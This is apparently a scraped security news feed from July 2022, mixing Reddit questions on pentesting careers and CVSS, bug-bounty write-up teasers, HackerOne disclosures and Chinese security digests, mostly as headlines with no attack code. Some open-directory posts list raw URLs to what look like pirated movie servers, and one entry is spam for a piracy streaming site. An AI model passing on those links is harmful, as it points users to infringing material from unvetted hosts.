Hi everybody. I don't know if this is the right place to talk about these themes, but I've seen some (really) older questions around, so I think I'll try to ask here. I'm a young computer engineer (master's) and I'm working for an IT company in the Cyber Security department; my tasks are to look after endpoint protection, firewalls, VPNs and so on. I know how to do pentests, I specialized in that at my university and I've participated in some real projects, and I also aim to acquire some certifications. Long story short, I think that I'll try in the future to side-hustle by doing penetration tests and vulnerability assessments for $$. My questions are: Have some of you done something similar? Which could be a good platform, or, what could be some good platforms to start with online? Do you have any advice in general? Do you think that there could be some other security-related side-hustles that could be better economically speaking? (I have to say that I love doing pentests.) Hoping for your help, I would like to thank in advance any one of you who will answer this post :) submitted by /u/Set-New [link] [comments]
    Does SQL injection require a 'changed' scope in the CVSS score?
    I'm currently going through some vulnerabilities for an advisory and one of my coworkers said that SQL injection always has the scope set to 'changed' when calculating CVSS scores. That doesn't seem right to me since the web application is still the affected host. It also bumps up our CVSS score to look extra scary -- a 9.9 for SQLi that requires low-privileges. Example vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H If the SQL server is on the same host, shouldn't the scope remain unchanged? Thanks! submitted by /u/Reemertastic [link] [comments]
    What’s something less technical and less stressful to transition to coming from pentesting?
Hi everyone. I’ve been doing pentesting for about 1 - 1.5 years now. I had a very high interest in pursuing a pentesting career about 2-3 years ago and I worked towards that goal by doing a lot of self learning and getting a couple certs (not OSCP, but pentest+ and eJPT). Now that I’ve been working in pentesting for a little while, I’ve realized that this isn’t for me and I want out. I find the stress that comes from performing penetration tests on a weekly basis and having to constantly battle with developers and app team owners is just too much for me. Before pentesting I worked in appsec (both static and dynamic) and before that had a very short stint as a Junior developer coming out of college. So I’ve been on the technical side of things pretty much my entire career. I find myself now at a place where I want to be less technical. I just want to have a stress free job that’s consistent. Any recommendations on what else I could explore? submitted by /u/anon2user [link] [comments]
    Does configuring a specific SSID create possibilities for additional security controls?
    My team makes use of a shared office space. The owner of the space offers public WiFi without password. It's possible to have our own SSID configured on the WiFi and enforce passwords for getting access. I'm interested to learn what extra security controls we can implement if we have our own SSID. submitted by /u/But-I-Am-a-Robot [link] [comments]
    Is a DNS Query to Coin Mining Domain dangerous?
Hello, I've received many repeated alerts from Security Onion, which stated that "ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)". The source IP address is from an internal endpoint and the destination IP address is from a DNS server. Is this event dangerous? In my opinion, it did not make any direct connection to the external IP. So, I do not see this event as a positive alert. Any advice would be highly appreciated. submitted by /u/sanba06c [link] [comments]
  • Open

    OAUTH Misconfiguration leads to Full Account Takeover
    Hello, you amazing hackers!! My name is Aditya Singh, a security researcher from India. In today’s blog, we are going to see OAUTH… Continue reading on Medium »
    Basic Linux skills for bug bounty hunting and ethical hacking (day-2)
    Hello guys, it’s Selim, back here with another interesting article. In the previous article we learned about how a beginner gets into bug… Continue reading on Medium »
    Start hacking career part 3
    Today I’ll share a list of bug bounty write-ups and a bug bounty checklist that I follow… Continue reading on Medium »
    Easy to find vulnerabilities that might get paid [part-2]
    Hello hackers, I am back with another short write-up, so this is the second part of easy-to-find vulnerabilities that might get paid, so… Continue reading on Medium »
    How I found my first bug
    Hi guys, this is my first post in celebration of my first bug found. Continue reading on Medium »
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on Medium »
    Recon on ASNs
    This article aims to give a basic demonstration of recon on ASNs. Before we get into the subject of recon on ASNs, we need to talk about some… Continue reading on Medium »
    Beginners Guide to Bug Bounty
    This guide will give you an idea on how to start out in bug bounties if you’re new to the topic. Continue reading on Medium »
    Reset password vulnerability
    In this tutorial you will learn how you can hack any users in your vulnerable website without having their password to login. Continue reading on Medium »
  • Open

    Anyone got a practice exam for FOR508 SANS
    Hi guys, doing the 508 exam in 2 weeks and wanted to know if someone has a spare practice exam test for me - if anyone got one, would also pay for it ... PM if possible THX :) submitted by /u/schoeringhumer [link] [comments]
  • Open

    OPEN SOURCE INTELLIGENCE WITH BLACKBIRD
    Information provided in this article is to assist users in scanning their own networks and systems, or networks and systems for which they… Continue reading on Medium »
    War in Ukraine / July 14
    Day 141: Tragedy in Vinnytsia — more than 20 victims Continue reading on Medium »
    The Moonshot Threat Bulletin at a Glance: June 2022
    This blog contains a short excerpt from June’s Moonshot Threat Bulletin. If you would like to access a one month free-trial to the full… Continue reading on Medium »
  • Open

    Showcasing Red Teaming TTPs — Weaponizing Custom Made C2 Channel via MS Word Macro (Part 2)
    Hi everyone, in the previous blog post (and video) we showcased how to embed a PowerShell payload inside a VBA macro for MS Word, but we were… Continue reading on Medium »
    How Purple Teaming Made Me A Better Blue Teamer
    Purple Team experiences Continue reading on Medium »
    Hashcat 101: Cracking Password Hashes
    Let’s say you are hacking a Linux box and all you have is a shadow.log like below Continue reading on Medium »
  • Open

    SecWiki News 2022-07-14 Review
    No news has been posted today yet~ For more of the latest articles, please visit SecWiki
  • Open

    Understanding and Bypassing Rate Limiting's
    Introduction Continue reading on InfoSec Write-ups »
    Elliptic Curve Signatures and How to Use Them in Your Java Application
    Most important properties of Elliptic Curves explained and how you can compute them in Java. Continue reading on InfoSec Write-ups »
    Let’s talk about buffer overflow
    A buffer overflow, or buffer overrun, occurs when more data is put into a fixed-length buffer than the buffer can handle. Continue reading on InfoSec Write-ups »
  • Open

    BGGP3: Crash on the Cob
    submitted by /u/netsecfriends [link] [comments]
    Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
    submitted by /u/albinowax [link] [comments]
    Researching access tokens for fun and knowledge
    submitted by /u/One-Assistance-8552 [link] [comments]
  • Open

    A Discord server for OSINT collaboration?
    submitted by /u/OvertOperator [link] [comments]
  • Open

    FreeBuf Morning Report | Uniswap loses $8 million in a phishing attack; PFC admits it was hit by a ransomware attack
    Uniswap lost $8 million in a phishing attack; PFC admits a ransomware attack leaked the information of 1.91 million patients.
    Tophant (斗象科技) receives a letter of thanks from the China National Vulnerability Database of Information Security (CNNVD) for its "vulnerability notification" work!
    Continuously strengthening its technology and platform advantages to help improve the national cybersecurity vulnerability governance system and capabilities.
    Java CommonsBeanUtils1 deserialization: hand-writing the EXP
    Java CommonsBeanUtils deserialization, studied from the angle of not looking at the yso chain first and trying to find the vulnerability on your own.
    Check now: AMD and Intel CPUs hit by another new vulnerability
    Researchers at ETH Zurich have discovered a vulnerability affecting many older AMD and Intel microprocessors that can lead to Spectre-based speculative execution attacks.
    New Android malware on Google Play installed 3 million times
    A new Android malware has appeared on the Google app store, with cumulative downloads already exceeding 3 million.
    Rising rather than falling: Ukraine's cyber agency reports a surge in cyberattacks in the second quarter
    The frequency and volume of cyberattacks against Ukraine surged in the second quarter of this year.
    Behavioral analysis of a botnet sample
    This article briefly analyzes the behavior of a botnet virus and proposes targeted countermeasures.
    New ransomware Lilith appears; enterprises already hit
    A new ransomware operation codenamed "Lilith" recently appeared online and has begun attacking.
    Information security officers cross swords | Review of the CSO forum at the "CIS Cybersecurity Innovation Conference, Summer Edition"
    How China's CSO system will develop in the future, what the capability evaluation metrics for CSOs are, and how the specific job responsibilities are changing: the closed-door CSO forum held lively sharing and discussion on these topics.
    New UEFI firmware vulnerabilities disclosed in more than 70 Lenovo laptop models
    Attacks exploiting UEFI firmware vulnerabilities are very dangerous: they let attackers run malware as soon as the operating system starts, even before Windows' built-in security protections are activated.
    With attack-defense exercises imminent, the "important secrets" of the Box Universe have leaked!
    Wawa (挖蛙) takes you to find out~
  • Open

    Analysis of the YamaBot malware used by the Lazarus hacker group
    Author: Shusei Tomonaga (朝長 秀誠) Translator: Knownsec 404 Lab translation team Original link: https://blogs.jpcert.or.jp/en/2022/07/yamabot.html JPCERT/CC is continuously investigating Lazarus activity. In 2021, JPCERT/CC presented its attack campaigns at CODE BLUE and HITCON. https://github.com/JPCERTCC/Lazarus-research/ ...
  • Open

    X — A Sexy Horror Story (2022) Film SUB ITA — CB01 Altadefinizione
    guarda X — A Sexy Horror Story (2022) film completo, X — A Sexy Horror Story streaming ita, X — A Sexy Horror Story streaming… Continue reading on Medium »
  • Open

    Cracking Kubernetes Authentication (AuthN) Model
    Part of this post’s contents first appeared in User and workload identities in Kubernetes, which was kindly edited, re-illustrated and exemplified by learnk8s.io, and is very friendly to beginners. The version posted here, in contrast, has a biased focus on the design and implementation, as well as in-depth discussions. Related posts: Cracking Kubernetes Node Proxy (aka kube-proxy); Cracking Kubernetes Network Policy; Cracking Kubernetes Authentication (AuthN) Model; Cracking Kubernetes RBAC Authorization (AuthZ) Model. TL;DR: This post digs into the Kubernetes authentication (AuthN) model. Specifically, we’ll start from analyzing the technical requirements of AuthN in Kubernetes, then design one for it (assuming it hasn’t had one yet); the final solution has an end-to-end workflow like below: Hop…

  • Open

    Vulnerability to unlock and remotely start virtually all models of Honda cars
    Article URL: https://twitter.com/wugeej/status/1547043442488147969 Comments URL: https://news.ycombinator.com/item?id=32090211 Points: 2 # Comments: 0
    A macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706
    Article URL: https://www.microsoft.com/security/blog/2022/07/13/uncovering-a-macos-app-sandbox-escape-vulnerability-a-deep-dive-into-cve-2022-26706/ Comments URL: https://news.ycombinator.com/item?id=32088196 Points: 8 # Comments: 0
    OpenSSL Heap Memory Corruption Vulnerability Fixed
    Article URL: https://thenewstack.io/openssl-heap-memory-corruption-vulnerability-fixed/ Comments URL: https://news.ycombinator.com/item?id=32087941 Points: 1 # Comments: 0
  • Open

    Introducing Decompiler Explorer (🐶⚡️)
    submitted by /u/Psifertex [link] [comments]
    CVE-2022-29885 - Apache Tomcat Cluster Service DoS
    submitted by /u/voidz0r [link] [comments]
    Dealing with Failure: Failure Escalation Policy in CLR Hosts
    submitted by /u/jeandrew [link] [comments]
    Attacking Active Directory: 0 to 0.9
    submitted by /u/CyberMasterV [link] [comments]
    How Windows Processes Work - Creation, APIs, Data Structures (Part 1)
    submitted by /u/sciencestudent99 [link] [comments]
    This Salesforce Tableau Server XSS vulnerability will not get a CVE attributed. Here is the PoC and the fixed versions.
    submitted by /u/obilodeau [link] [comments]
    From Prototype Pollution to Remote Code Execution in Blitz.js
    submitted by /u/SonarPaul [link] [comments]
    Affinis - Subdomain Discovery Through RNN (Recurrent Neural Network)
    submitted by /u/jibblz [link] [comments]
    The Long Tail of Log4Shell Exploitation
    submitted by /u/scopedsecurity [link] [comments]
    Introducing Pretender: Your New Sidekick for Relaying Attacks
    submitted by /u/RedTeamPentesting [link] [comments]
    CVE-2022-32223 Discovery: DLL Hijacking via npm CLI
    submitted by /u/mkatch [link] [comments]
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP ($6,000 Bug Bounty)
    submitted by /u/numanturle [link] [comments]
    Rolling PWN Attack Affecting Honda Vehicles
    submitted by /u/0xdea [link] [comments]
    Executing Arbitrary Code Over a Phone Line Thanks to the XBAND Video Game Modem
    submitted by /u/vincelasal [link] [comments]
  • Open

    [Security Bulletin] Microsoft's July 2022 Patch Tuesday fixes multiple high-risk vulnerabilities
    Microsoft recently released its July 2022 security patches, fixing 84 vulnerabilities across 36 Microsoft products, including 52 privilege escalation vulnerabilities, 4 security feature bypass vulnerabilities, 12 remote code execution vulnerabilities, 11 information disclosure...
  • Open

    Four more Movies/Series ODs (Lots of stuff)
    http://www.moviefyy.com/Film/ http://192.95.30.30/lol/ http://103.222.20.150/ftpdata/ http://167.114.174.132:9092/ submitted by /u/LordPato [link] [comments]
    Two Huge Movie/Series Open Directories
    http://ir2.papionvod.ir/Media/ https://dl3.3rver.org/ submitted by /u/LordPato [link] [comments]
    Photos of Idaho things: Idaho state fair, Idaho potatoes, Idaho Mormons, Idaho vacuum cleaner museum....
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    CVE-2022-32224: Possible RCE escalation bug in SerializedColumns in ActiveRecord
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-32224-possible-rce-escalation-bug-with-serialized-columns-in-active-record/81017 Comments URL: https://news.ycombinator.com/item?id=32082974 Points: 1 # Comments: 0
  • Open

    Cyber Security Kill Chain : Explained
    A hacker only needs one attack vector to succeed. Your responsibility is to identify these potential attack vectors as “your security is… Continue reading on Medium »
  • Open

    OTP Bypass via Response Manipulation
    Hello Readers, I am Tariq Rafiq Kehar, a bug hunter. Continue reading on Medium »
    Useful Offensive Snippets
    I will update this post regularly, I am starting with a few of my most commonly used snippets. Continue reading on Medium »
    How to study Cyber Security on your own for free?
    This was always the question in my mind from the very beginning and after studying for months and doing deep analysis and research, I came… Continue reading on Medium »
    How to find Origin IP
    Hello people!!! I’m Boopathi. In this blog, I’m going to discuss Origin IP Continue reading on Medium »
    COLIZEUM Bug-Bounty Program
    Report a bug and get Whitelisted for Colizeum ELITE NFT sale, this is an opportunity to get hands-on ELITE NFT before anybody else does. Continue reading on Medium »
    Microsoft Teams — Cross Site Scripting (XSS) Bypass CSP
    During my early stages of employment at Gais Cyber Security in 2021, my manager had reached out to me over the phone and said with… Continue reading on Medium »
  • Open

    War in Ukraine / July 12
    Day 140: The question of the day: will it be possible to agree on the export of Ukrainian grain by sea Continue reading on Medium »
  • Open

    SecWiki News 2022-07-13 Review
    Analysis of cloud sandbox traffic identification techniques by ourren; Implementing software composition analysis (SCA) with open-source tools by ourren; Kscan: an all-round scanner written in pure Go by ourren; Suspected PurpleFox keeps up attack activity using multiple techniques by ourren; Understanding C4ISR: for informatized warfare we still need to learn from the US by ourren; For more of the latest articles, please visit SecWiki
  • Open

    Stored XSS for Grafana dashboard URL
    GitLab disclosed a bug submitted by xanbanx: https://hackerone.com/reports/684268 - Bounty: $2500
    Undici does not use CONNECT or otherwise validate upstream HTTPS certificates when using a proxy
    Node.js disclosed a bug submitted by pimterry: https://hackerone.com/reports/1583680
    Undici ProxyAgent vulnerable to MITM
    Internet Bug Bounty disclosed a bug submitted by pimterry: https://hackerone.com/reports/1599063 - Bounty: $1000
    One Click XSS in [www.shopify.com]
    Shopify disclosed a bug submitted by comwrg: https://hackerone.com/reports/1563334 - Bounty: $500
    rubygems.org Batching attack to `confirmation_token` by bypass rate limit
    Internet Bug Bounty disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1559262 - Bounty: $480
    CVE-2021-40438 on cp-eu2.acronis.com
    Acronis disclosed a bug submitted by savik: https://hackerone.com/reports/1370731 - Bounty: $150
    [CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day
    Acronis disclosed a bug submitted by rhinestonecowboy: https://hackerone.com/reports/1425474 - Bounty: $1000
  • Open

    Bypass Windows Defender by utilizing malicious SMB requests inside MS Word Macro
    Hope you enjoyed it, learned something new, and I would love to receive feedback. https://youtu.be/A8DkVDQW1-w submitted by /u/lsecqt [link] [comments]
    Free4All Information Technology and Cyber Security Resources
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption
    We show how metadata encryption and decryption contributes to making Cobalt Strike an effective emulator that is difficult to defend against. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption appeared first on Unit 42.
  • Open

    Why isn't there an AppArmor alternative for Windows?
    I know Windows has Mandatory Integrity Control, but it doesn't have Mandatory Access Control like Linux does with AppArmor or SELinux. It seems like AppArmor would be useful, at least for power users so my question is: Why isn't there an AppArmor (MAC) alternative for Windows? submitted by /u/greyyit [link] [comments]
    Is it me, the company or my job?
    Hello. For a long time I have worked as an ethical hacker/red teamer. A few months ago I started feeling that I do not learn anything new, I am stuck and there is no way for me to improve. When I come home, I have no energy to do some CTFs or start my own project. I just want to lie in my bed and listen to a podcast or video on a completely different topic. In this company, we do pentests of huge corporates and many times many things go wrong - the timing, the preparedness from the side of the client, the scope. All these things touch me on a very deep level; I want to deliver very professional work and do the best I can. But all of these things suck my energy. I have said many times that things need to change because otherwise we will burn out quickly, all of us. We need new stuff, something to make us inquisitive, some new challenges - not yet another scope of 1 web banking application with a limited subscope of 20 API calls and 1 host. But nothing changed; the people above do not listen. All they care about is the profit. We do sometimes get our hands on some nice projects, but usually these are like a firefly in the night, very very rare. I feel like I have reached my capacity in ethical hacking and would like to improve in security research and exploit development, but I do not have any mentor to follow me through. And I like the money I get now because I do my job very well and can do any task I am given. Companies I have found in the market want someone already skilled enough to just throw zero-days out of their sleeve. I want to move but have no energy to do it. Is there a problem in me? Should I change my attitude (which is already against my belief) to just do the job and then go home empty and watch other things - "it is just my job, I can do anything else in my free time"? Or is it the company that is wrong? Or is it the whole of ethical hacking or infosec in general? Is there any reasonable advice on how to actually solve this...? Thank you for reading... submitted by /u/elvisdnb [link] [comments]
    Compromised Device - Incident Process post device containment
    Hi Guys, I've got an incident where a device has been compromised. We've managed to isolate the device, take it offline and rebuild it. Using our SIEM tool, what should I be looking at to look for signs of persistence, lateral movement or C2 communications? I can look up the user and get everything our SIEM logs for them, but then with all this information I can never make heads or tails of it... A lot of the stuff is probably normal traffic such as VPN connections, connecting to Microsoft etc. What can I do to filter out all of this noise and find the other stuff, or is that what it's like for everyone? Should I be looking at IoCs for that specific malware? Should I be looking at the device's activity? Do you (yes you, reader) spend hours looking for persistence or do you just rebuild and move on to the next ticket? We use LogRhythm for reference, so any specific tips would be great :) Please feel free to recommend books, papers, courses or videos to educate myself, and of course tips on here are super helpful. *Can't really ask someone within the team as we're a very immature team with mature tooling/services, so no one really knows how to do this* submitted by /u/Maidenless4ever [link] [comments]
    Is it worth paying an extra $29/yr for Keepers BreachWatch?
    Keeper says that BreachWatch monitors the dark Web for breached accounts, but is it actually effective? If it only monitors limited databases it's not particularly useful. submitted by /u/ForComputerStuff [link] [comments]
  • Open

    IW Weekly #9: Web3 Hacking, Leveraging Google Dorks, Python Flaws, and more…
    No content preview
  • Open

    FreeBuf Morning Report | Biden's iCloud account suspected hacked; WPS responds again to the deletion of users' local files
    A poster on the anonymous social media site 4chan claims to have gotten into Hunter Biden's iCloud account and has published photos and videos purportedly extracted from it.
    [Vulnerability Analysis] Drupal remote code execution (CVE-2017-6920)
    A few days ago, while taking part in the FOFA attack-defense challenge, I came across a Drupal "blind box" vulnerability environment. I eventually determined the vulnerability was CVE-2017-6920, but still could not get the flag, because there are not many reference articles online...
    A rookie's attack-defense exercise journey
    I recently took part in a small attack-defense exercise, my first time participating in this kind of event, so here is a brief record of the process.
    Hackers target the president of the European Central Bank
    European Central Bank President Christine Lagarde was the target of an attempted cyberattack.
    Lithuanian energy company's operations disrupted by large-scale DDoS attack
    Lithuanian energy company Ignitis Group recently suffered its largest cyberattack in a decade.
    Microsoft: more than 10,000 organizations hit by phishing attacks
    Microsoft says that since September 2021 more than ten thousand organizations have been targeted by phishing attacks.
    Insight into zero trust: review of the Zero Trust Security Forum at the CIS Cybersecurity Innovation Conference, Summer Edition
    Through substantive session content, the experts at the Zero Trust Security Forum comprehensively outlined today's zero-trust deployment schemes and the path of future development.
  • Open

    Pocsuite3 Getting Started Tutorial
    Author: Knownsec 404 Lab Date: July 13, 2022 1 Introduction Pocsuite3 is an open-source (GPLv2) remote vulnerability testing framework built by Knownsec 404 Lab. Since it was open-sourced in 2015, the Knownsec security research team has maintained it continuously with ongoing updates and iterations. Some features: it supports three modes, verify, attack and shell; it was not built only for scanning and can be used in other scenarios, such as vulnerability exploitation or obtaining an interactive ... on the target
    Exploring traffic-level WAF bypass for Java file uploads
    Author: Y4tacker This article is a submission by the author; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org Foreword I happened to see ch1ng's article and found it very interesting; I have to say the master is very skilled, but looking at those long functions I always felt there would be something even more clever, and fortunately there really is, so I am taking this opportunity to publish it and dig in, while also marvelling at the subtleties of RFC documents. Of course, the technique this article targets is only a WAF bypass at the traffic level...
  • Open

    Career question about private sector
    Hi, interested in computer forensics but it seems to be dominated by LE. Nothing against LE, but I would like to enter a career where I wouldn't necessarily HAVE to go through LE. So can anyone advise on what some of the private sector roles and career paths in the computer forensics field are? I wouldn't mind being some sort of digital private investigator but would like to know how realistic that would be. TIA! submitted by /u/zrobb999 [link] [comments]
    What data can I pull from Echo Dot & how long before it’s overwritten by new data?
    Context: my best friend died recently and I just realized that there are a few echo dots at his house. When I told his family that it may be possible to pull audio from the echo dots, so as to provide some insight into what was happening before he died, they were very interested. I am fairly tech savvy but only have dabbled in computer forensics at a hobbyist/total novice level. That being said, is it feasible for me to attempt to grab data from my late friend’s echo dots? What’s the process? What should I be wary of, what kinds of credentials do I need etc? Thanks so much in advance. Hope my question made sense; I’m still pretty foggy mentally as I process my friend’s untimely death :( submitted by /u/feelin_weird [link] [comments]
    Volatility Help - pagefile & hiberfil
    Hi all. I've been poking around trying to analyze a pagefile and hiberfil I recovered, but for the life of me, I can't get volatility to play nice with me. So for starters, I've confirmed via the registry that the processor is AMD64 architecture and that it's Windows 10 19041.1.vb_release.191206-1406. I've tried using volatility to convert to a raw image (vol -f file.sys imagecopy -O target.raw) and no matter what profile I apply - which, ostensibly should be Win10x64_19041 - no plugins will take against it. Not in Volatility 2.6, 3.1, or 3.2. In the latter two, imagecopy is not an available plugin. I am not sure what I am doing wrong, if I am missing plugins, or what have you, but I would appreciate any guidance. I would buy Arsenal Recon's tools, but that isn't currently an option. submitted by /u/KillithidMindslayer [link] [comments]

  • Open

    Can you get malware just from entering a website?
    Not really sure if this subreddit is the right place to ask, so if it’s not, please excuse me. So long story short, I googled “youtube” and clicked a little too fast on the top result, which seemed like the official youtube link. For those asking, the link I clicked had the “ad” mentioned above it, so it was the top result and the actual official youtube link came right under. After clicking on the top link, a weird website opened that was definitely not YouTube. It clearly looked like something to scare people (e.g., your OS is infected or call this number for help in bold red letters). I’d like to know how likely it is that some malware is now on my computer resulting from this? Is it possible to get any virus only from entering a website? I didn’t click on anything after entering this website, I only took a screenshot (if people want to see) and closed everything. Thank you! submitted by /u/TangerineNo6098 [link] [comments]
    How well does CRTP teach you about pivoting and windows privilege escalation?
    In preparation for the OSCP I thought about taking the CRTP. I read that it teaches you pivoting and Windows escalation, but how well though? Like OSCP-level well? Will I need other training besides it? submitted by /u/watermelonSoundsNice [link] [comments]
    Need some advice on certifications paths to take
    I got like $700-800 to spend and don't know which path I should take for the best looking resume. I failed my OSCP exam and a retake costs $250. I'm very bad at AD and Windows priv escalation, so I thought about taking CRTP (the cert costs $250, and the videos and lab alone cost $70). Having taken the OSCP exam before, I can say the exam is horrible and I may fail again even with CRTP, so I'm thinking about potentially taking PNPT ($300) or eCPPT ($400). I have a few routes to take: I could take the CRTP cert to have a good looking cert on the resume (don't know exactly how recruiters will look at it), or I could just take the training alone for $70 and save for another potential OSCP retake, or maybe PNPT/eCPPT if things don't work out with the OSCP. Kinda lost with this; will I miss out if I take the CRTP training alone without the cert? Help submitted by /u/watermelonSoundsNice [link] [comments]
    Assessing cyber resilience
    Hi all! I’ve got a question about assessing the cyber resilience of an organization. Is there a standard to assess cyber resilience? Are there frameworks described? Are there good books or articles about cyber resilience? Thanks in advance! submitted by /u/overigegebruiker12 [link] [comments]
  • Open

    Retbleed: Arbitrary Speculative Code Execution with Return Instructions
    submitted by /u/mstromich [link] [comments]
    How to secure Kubernetes deployment with signature verification – Cosign and Connaisseur
    submitted by /u/MiguelHzBz [link] [comments]
    Microsoft Azure Site Recovery DLL Hijacking ($10,000 Bug Bounty)
    submitted by /u/dinobyt3s [link] [comments]
    From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
    submitted by /u/SCI_Rusher [link] [comments]
    Exploratory analysis of CVEs - Some interesting viz
    submitted by /u/10xpdev [link] [comments]
    Exploiting Authentication in AWS IAM Authenticator for Kubernetes
    submitted by /u/albinowax [link] [comments]
  • Open

    Rails Security Release CVE-2022-32224
    Article URL: https://rubyonrails.org/2022/7/12/Rails-Versions-7-0-3-1-6-1-6-1-6-0-5-1-and-5-2-8-1-have-been-released Comments URL: https://news.ycombinator.com/item?id=32075137 Points: 3 # Comments: 0
  • Open

    Web vulnerability discovery and exploitation
    Note: this article is for reference and study only; the laws of every country explicitly prohibit illegal hacker attacks, and you bear the consequences yourself!
    FreeBuf Morning Report | US releases "quantum-resistant algorithms"; EDF faces review of its cybersecurity record
    The US National Institute of Standards and Technology (NIST) has now formally approved four cryptographic algorithm techniques that can resist quantum computer attacks, to guard against future cyberattacks.
    Attackers steal $540 million from Axie Infinity with a fake job offer
    Attackers sent a senior Axie Infinity engineer a fake job offer via LinkedIn and stole $540 million from the company.
    GitHub Actions and Azure virtual machines are being used for cloud cryptomining
    According to The Hacker News, GitHub Actions and Azure virtual machines (VMs) are being used for cloud-based cryptocurrency mining. This means the illicit mining industry has started turning its attention to cloud resources.
    Beware of Google updates: they may be ransomware in disguise
    A new ransomware is appearing online in the guise of a Google update, using Windows system features to carry out extortion attacks.
    Over the next five years, online payment fraud will cause losses of up to $343 billion
    Over the next five years, total global losses from online payment fraud will exceed $343 billion.
    Using offense and defense to drive security | Review of the Attack-Defense Forum at the "CIS Cybersecurity Innovation Conference, Summer Edition"
    As one of the three major forums of the CIS Cybersecurity Innovation Conference Summer Edition, the live-network adversarial and attack-defense exercise session brought together several experts and leading figures to discuss new developments in enterprise security from an offense-and-defense perspective.
  • Open

    War in Ukraine / July 11
    Day 139: Ukraine’s economic problems Continue reading on Medium »
    No Future for the North Korea Fixer
    An indictment by US authorities against two crypto diplomats, now added to the US Most-Wanted list, sparked an #OSINT investigation Continue reading on Medium »
    Google Hacking
    What is a Google Dork? Continue reading on Medium »
  • Open

    Interview with a 16-year-old Lapsus$ Hacker
    submitted by /u/cybersocdm [link] [comments]
  • Open

    SecWiki News 2022-07-12 Review
    afrog releases new version Release 1.3.5 "Really missed you" by 胖胖的ALEX; Building a breach and attack simulation exercise platform by ourren; Open-source security: challenges, solutions and opportunities by ourren; Learning continuous integration security from a CI/CD vulnerability range by ourren; Bad Packet: measuring IoT botnet activity in the wild by Avenger; SecWiki Weekly (Issue 436) by ourren; For more of the latest articles, please visit SecWiki
  • Open

    Write Up 1: Hellosign Integration [Full Read SSRF]
    In the name of God, the Most Gracious, the Most Merciful Continue reading on Medium »
    Multiple $50,000 Reward Tickets in Aleph Zero’s and Immunefi’s Bug Bounty Program
    Aleph Zero has decided to partner with Immunefi to deliver a bug bounty program dedicated to seeking out vulnerabilities that may hinder… Continue reading on Aleph Zero Foundation »
    Business Logic Vulnerability — REGISTRATION Using Fake Email Account & Valid Company Name
    Description: Continue reading on Medium »
    Recox v2.0 -classifying vulnerabilities in web applications
    The script’s goal is to aid in the classification of vulnerabilities in web applications. RecoX, the emerging methodology, can detect… Continue reading on Medium »
    CSRF Vulnerability
    Hello, welcome to my new article, this article will talk about how I found CSRF on the login page. First, let me introduce myself, my name… Continue reading on Medium »
    What Bug Bounty is and why it is now also used by cybercrime
    by Víctor Ruiz, founder of SILIKN and certified cybersecurity instructor, CSCT™. Continue reading on Medium »
  • Open

    ChromeLoader: New Stubborn Malware Campaign
    A malicious browser extension is the payload of the ChromeLoader malware family, serving as adware and an infostealer, leaking users’ search queries. The post ChromeLoader: New Stubborn Malware Campaign appeared first on Unit 42.
  • Open

    Attacking Active Directory: TryHackMe
    Today, we are up with yet a new walkthrough, but the domain is something interesting. We would be looking at a room on TryHackMe called… Continue reading on Medium »
    What is Red-Team Testing | Red Team Assessment- Komodo Cyber Security
    WHY DO YOU NEED A RED-TEAM? Continue reading on Medium »
  • Open

    Huge list of cell phone ringtones
    http://onj3.andrelouis.com/phonetones/unzipped/ submitted by /u/Buzz1ight [link] [comments]
    Another huge list of ODs! :D (31 ODs)
    https://openweb.uz/apps/ - Software http://iranfl.persiangig.com - Misc http://www.4oneworld.org/files/ - Images http://www.andrelouis.com/media/ - Music & some other stuff https://gstreamer.freedesktop.org/media/ - Video & Music (and some other stuff) http://www.geo.mtu.edu/volcanoes/boris/ - Misc http://www.narrowbandimaging.com/incoming/ - Misc https://son.rochester.edu/assets/images/ - Images http://lamborns.com/pictures/ - Images https://ww2.cs.fsu.edu/~curci/ - PDFs and Images https://ftp.tourmentine.com - Images, MP3s, Videos, and some other stuff https://natewren.com/themes/ - Images https://websitearchive2020.nepa.gov.jm/new/ - Misc https://ferry-county.com/Images/ - Images http://shortpumppourhouse.com/images/ - Images http://www.pezlist.com/mcpez/images/ - Images http://www.sckans.edu/ext/ - Misc https://otlibrary.com/wp-content/gallery/ - Images http://www.nwhiker.com/wallpaper/ - Images https://jorge.fbarr.net/files/ - Misc https://ftp.mpi-inf.mpg.de/pub/ - Misc http://www.4oneworld.org/files/ - Dead https://www.cs.cmu.edu/~quake-papers/ - Misc http://ftp.esrf.eu | ftp://ftp.esrf.eu - Misc https://hippych.com/files/ - Misc http://46.219.24.140 - Misc http://www.lookas.net/ftp/ - Software & some other stuff https://www2.census.gov https://ftp.sangoma.com - Software https://downloads.thebobsgamingnetwork.net - Minecraft server? https://www.stchur.com/personal/ - Random http://tomflahertymusic.com/mp3s/ - MP3s *New! http://penguinradio.dominican.edu - Audio & MP3s Pastebin: https://pastebin.com/Np7iufPw submitted by /u/ilikemacsalot [link] [comments]
    short history documentaries, survival guides and other miscellaneous stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Dungeons and Dragons stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Rolling-PWN vulnerability affects all Honda vehicles
    Article URL: https://rollingpwn.github.io/rolling-pwn/ Comments URL: https://news.ycombinator.com/item?id=32066201 Points: 141 # Comments: 93
  • Open

    Github base action takeover which is used in `github.com/Shopify/unity-buy-sdk`
    Shopify disclosed a bug submitted by codermak: https://hackerone.com/reports/1439355 - Bounty: $800
  • Open

    Voltage glitch injection on nRF52 platform chips to bypass debug protection
